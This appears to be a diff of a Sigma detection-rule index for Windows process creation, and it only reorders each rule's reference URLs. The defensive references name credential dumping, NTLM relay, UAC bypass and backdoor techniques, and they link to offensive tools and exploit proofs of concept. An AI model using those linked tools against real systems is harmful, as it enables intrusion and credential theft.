"logsource.product": "windows", "refs": [ "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc", - "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", - "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", - "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20IP%20Scanner", + "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", + "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", + "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_advanced_ip_scanner.yml" ], "tags": [ @@ -49084,8 +49084,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/elastic/detection-rules/blob/dd224fb3f81d0b4bf8593c5f02a029d647ba2b2d/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml", "https://twitter.com/med0x2e/status/1520402518685200384", + "https://github.com/elastic/detection-rules/blob/dd224fb3f81d0b4bf8593c5f02a029d647ba2b2d/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntlmrelay.yml" ], "tags": [ @@ -49144,8 +49144,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll", "https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/", + "https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml" ], "tags": [ @@ -49399,8 +49399,8 @@ "logsource.product": "windows", "refs": [ "https://www.fortiguard.com/threat-signal-report/4718?s=09", - "https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/", "https://lolbas-project.github.io/lolbas/Binaries/Regasm/", + "https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml" ], "tags": [ @@ -49433,10 +49433,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/defaultnamehere/cookie_crimes/", "https://yoroi.company/wp-content/uploads/2022/05/EternityGroup_report_compressed.pdf", - "https://www.mdsec.co.uk/2022/10/analysing-lastpass-part-1/", + "https://github.com/defaultnamehere/cookie_crimes/", "https://github.com/wunderwuzzi23/firefox-cookiemonster", + "https://www.mdsec.co.uk/2022/10/analysing-lastpass-part-1/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browser_remote_debugging.yml" ], "tags": [ @@ -49469,8 +49469,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.pdq.com/pdq-deploy/", "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1072/T1072.md", + "https://www.pdq.com/pdq-deploy/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pdq_deploy.yml" ], "tags": [ @@ -49517,8 +49517,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel", + "https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pingback_backdoor.yml" ], "tags": [ @@ -49576,8 +49576,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/c4732632-9c1d-4980-9fa8-1d98c93f918e.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md", + "https://eqllib.readthedocs.io/en/latest/analytics/c4732632-9c1d-4980-9fa8-1d98c93f918e.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bootconf_mod.yml" ], "tags": [ @@ -49701,8 +49701,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hybrid-analysis.com/sample/f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5?environmentId=100", "https://adsecurity.org/?p=2288", + "https://www.hybrid-analysis.com/sample/f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sysvol_access.yml" ], "tags": [ @@ -49736,8 +49736,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04", "https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/", + "https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml" ], "tags": [ @@ -49770,8 +49770,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", "https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings", + "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_dacl_modification_set_service.yml" ], "tags": [ @@ -49795,8 +49795,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_critical_keys.yml" ], "tags": [ @@ -49854,8 +49854,8 @@ "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", - "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime", + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_unusual_parents.yml" ], "tags": [ @@ -49964,9 +49964,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/210b4ea4-12fc-11e9-8d76-4d6bb837cda4.html", "https://eqllib.readthedocs.io/en/latest/analytics/1e1ef6be-12fc-11e9-8d76-4d6bb837cda4.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md", - "https://eqllib.readthedocs.io/en/latest/analytics/210b4ea4-12fc-11e9-8d76-4d6bb837cda4.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lsass_dump.yml" ], "tags": [ @@ -50032,8 +50032,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/cfc8870b-ccd7-4210-88cf-a8087476a6d0", "https://app.any.run/tasks/c28cabc8-a19f-40f3-a78b-cae506a5c0d4", + "https://app.any.run/tasks/cfc8870b-ccd7-4210-88cf-a8087476a6d0", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_system_susp_paths.yml" ], "tags": [ @@ -50099,8 +50099,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100", "https://securelist.com/schroedingers-petya/78870/", + "https://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_notpetya.yml" ], "tags": [ @@ -50151,8 +50151,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/fatedier/frp", "https://asec.ahnlab.com/en/38156/", + "https://github.com/fatedier/frp", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_frp.yml" ], "tags": [ @@ -50297,8 +50297,8 @@ "logsource.product": "windows", "refs": [ "https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html", - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_grabbing_sensitive_hives_via_reg.yml" ], @@ -50349,12 +50349,12 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.joeware.net/freetools/tools/adfind/", - "https://thedfirreport.com/2020/05/08/adfind-recon/", "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", - "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md", + "https://www.joeware.net/freetools/tools/adfind/", "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", + "https://thedfirreport.com/2020/05/08/adfind-recon/", "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", + "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_adfind_usage.yml" ], "tags": [ @@ -50397,11 +50397,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1", "https://blog.alyac.co.kr/1901", - "https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/", - "https://en.wikipedia.org/wiki/Hangul_(word_processor)", "https://twitter.com/cyberwar_15/status/1187287262054076416", + "https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/", + "https://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1", + "https://en.wikipedia.org/wiki/Hangul_(word_processor)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hwp_exploits.yml" ], "tags": [ @@ -50511,8 +50511,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/kagancapar/status/1515219358234161153", "https://github.com/kagancapar/CVE-2022-29072", + "https://twitter.com/kagancapar/status/1515219358234161153", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_7zip_cve_2022_29072.yml" ], "tags": [ @@ -50737,8 +50737,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remote_service.yml" ], "tags": [ @@ -50806,8 +50806,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_workflow_compiler.yml" ], "tags": [ @@ -50883,8 +50883,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains", "https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1124/T1124.md", + "https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_w32tm.yml" ], "tags": [ @@ -51035,8 +51035,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/", "https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/", + "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_virtualbox.yml" ], "tags": [ @@ -51110,9 +51110,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.echotrail.io/insights/search/mshta.exe", - "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", "https://en.wikipedia.org/wiki/HTML_Application", + "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", + "https://www.echotrail.io/insights/search/mshta.exe", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mshta_pattern.yml" ], "tags": [ @@ -51167,8 +51167,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://github.com/3proxy/3proxy", + "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_3proxy_usage.yml" ], "tags": [ @@ -51203,8 +51203,8 @@ "refs": [ "https://twitter.com/d1r4c/status/1279042657508081664", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file", - "https://curl.se/docs/manpage.html", "https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76", + "https://curl.se/docs/manpage.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml" ], "tags": [ @@ -51460,9 +51460,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/", "https://guides.lib.umich.edu/c.php?g=282942&p=1885348", "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", + "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_image.yml" ], "tags": [ @@ -51495,8 +51495,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://redcanary.com/blog/lateral-movement-winrm-wmi/", "https://twitter.com/bohops/status/994405551751815170", + "https://redcanary.com/blog/lateral-movement-winrm-wmi/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winrm_execution.yml" ], "tags": [ @@ -51530,8 +51530,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070/T1070.md", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070/T1070.md", "https://eqllib.readthedocs.io/en/latest/analytics/c91f422a-5214-4b17-8664-c5fcf115c0a2.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_fsutil_usage.yml" ], @@ -51556,9 +51556,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://twitter.com/SBousseaden/status/1211636381086339073", "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", "https://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html", - "https://twitter.com/SBousseaden/status/1211636381086339073", "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_lateral_movement.yml" ], @@ -51804,9 +51804,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", "https://twitter.com/jonasLyk/status/1555914501802921984", "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_image.yml" ], "tags": [ @@ -51981,8 +51981,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Infdefaultinstall/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md#atomic-test-4---infdefaultinstallexe-inf-execution", + "https://lolbas-project.github.io/lolbas/Binaries/Infdefaultinstall/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_infdefaultinstall.yml" ], "tags": [ @@ -52050,8 +52050,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", "https://twitter.com/bohops/status/948061991012327424", + "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cl_invocation.yml" ], "tags": [ @@ -52300,9 +52300,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/_JohnHammond/status/1531672601067675648", "https://twitter.com/nao_sec/status/1530196847679401984", "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", + "https://twitter.com/_JohnHammond/status/1531672601067675648", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt.yml" ], "tags": [ @@ -52401,11 +52401,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3", + "https://twitter.com/GadixCRK/status/1369313704869834753?s=20", "https://twitter.com/BleepinComputer/status/1372218235949617161", + "https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3", "https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/", "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", - "https://twitter.com/GadixCRK/status/1369313704869834753?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_hafnium.yml" ], "tags": [ @@ -52439,9 +52439,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-7---create-a-process-using-wmi-query-and-an-encoded-command", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware", "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-7---create-a-process-using-wmi-query-and-an-encoded-command", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_unc2452_ps.yml" ], "tags": [ @@ -52606,10 +52606,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows/compatibility/ntvdm-and-16-bit-app-support", "https://app.any.run/tasks/93fe92fa-8b2b-4d92-8c09-a841aed2e793/", - "https://support.microsoft.com/fr-fr/topic/an-ms-dos-based-program-that-uses-the-ms-dos-protected-mode-interface-crashes-on-a-computer-that-is-running-windows-7-5dc739ea-987b-b458-15e4-d28d5cca63c7", + "https://docs.microsoft.com/en-us/windows/compatibility/ntvdm-and-16-bit-app-support", "https://app.any.run/tasks/214094a7-0abc-4a7b-a564-1b757faed79d/", + "https://support.microsoft.com/fr-fr/topic/an-ms-dos-based-program-that-uses-the-ms-dos-protected-mode-interface-crashes-on-a-computer-that-is-running-windows-7-5dc739ea-987b-b458-15e4-d28d5cca63c7", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_16bit_application.yml" ], "tags": [ @@ -52860,8 +52860,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", + "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_appx_execution.yml" ], "tags": [ @@ -52997,8 +52997,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.001/T1562.001.md", - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_add.yml" ], "tags": [ @@ -53023,8 +53023,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://h.43z.one/ipconverter/", "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608", + "https://h.43z.one/ipconverter/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_obfuscated_ip_via_cli.yml" ], "tags": [ @@ -53082,8 +53082,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://redcanary.com/blog/intelligence-insights-april-2022/", "https://www.echotrail.io/insights/search/regsvr32.exe", + "https://redcanary.com/blog/intelligence-insights-april-2022/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_spawn_explorer.yml" ], "tags": [ @@ -53116,8 +53116,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/6", "https://threathunterplaybook.com/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.html", + "https://github.com/OTRF/detection-hackathon-apt29/issues/6", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_high_integrity_sdclt.yml" ], "tags": [ @@ -53151,9 +53151,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://ragged-lab.blogspot.com/2020/06/it-is-always-dns-powershell-edition.html", - "https://blu3-team.blogspot.com/2019/08/powershell-dns-c2-notes.html", "https://github.com/lukebaggett/dnscat2-powershell", + "https://blu3-team.blogspot.com/2019/08/powershell-dns-c2-notes.html", + "https://ragged-lab.blogspot.com/2020/06/it-is-always-dns-powershell-edition.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnscat2_powershell_implementation.yml" ], "tags": [ @@ -53251,9 +53251,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1", "https://blog.malwarebytes.com/threat-analysis/2016/04/rokku-ransomware/", "https://digital-forensics.sans.org/blog/2010/06/04/wmic-draft/", + "https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_execution.yml" ], "tags": [ @@ -53287,8 +53287,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "Internal Research", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks", + "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_change.yml" ], "tags": [ @@ -53391,8 +53391,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120", "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", + "https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_system32.yml" ], "tags": [ @@ -53601,8 +53601,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/attrib", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-3---create-windows-system-file-with-attrib", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/attrib", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_system.yml" ], "tags": [ @@ -53775,8 +53775,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/ab7a6ef4-0983-4275-a4f1-5c6bd3c31c23.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md", + "https://eqllib.readthedocs.io/en/latest/analytics/ab7a6ef4-0983-4275-a4f1-5c6bd3c31c23.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_audio_capture.yml" ], "tags": [ @@ -53800,10 +53800,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/", - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return", "https://nodejs.org/api/cli.html", + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_node_abuse.yml" ], "tags": [ @@ -53871,8 +53871,8 @@ "logsource.product": "windows", "refs": [ "https://mattharr0ey.medium.com/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b", - "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", "https://github.com/hfiref0x/UACME", + "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml" ], "tags": [ @@ -53906,8 +53906,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hybrid-analysis.com/sample/2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507?environmentId=100", 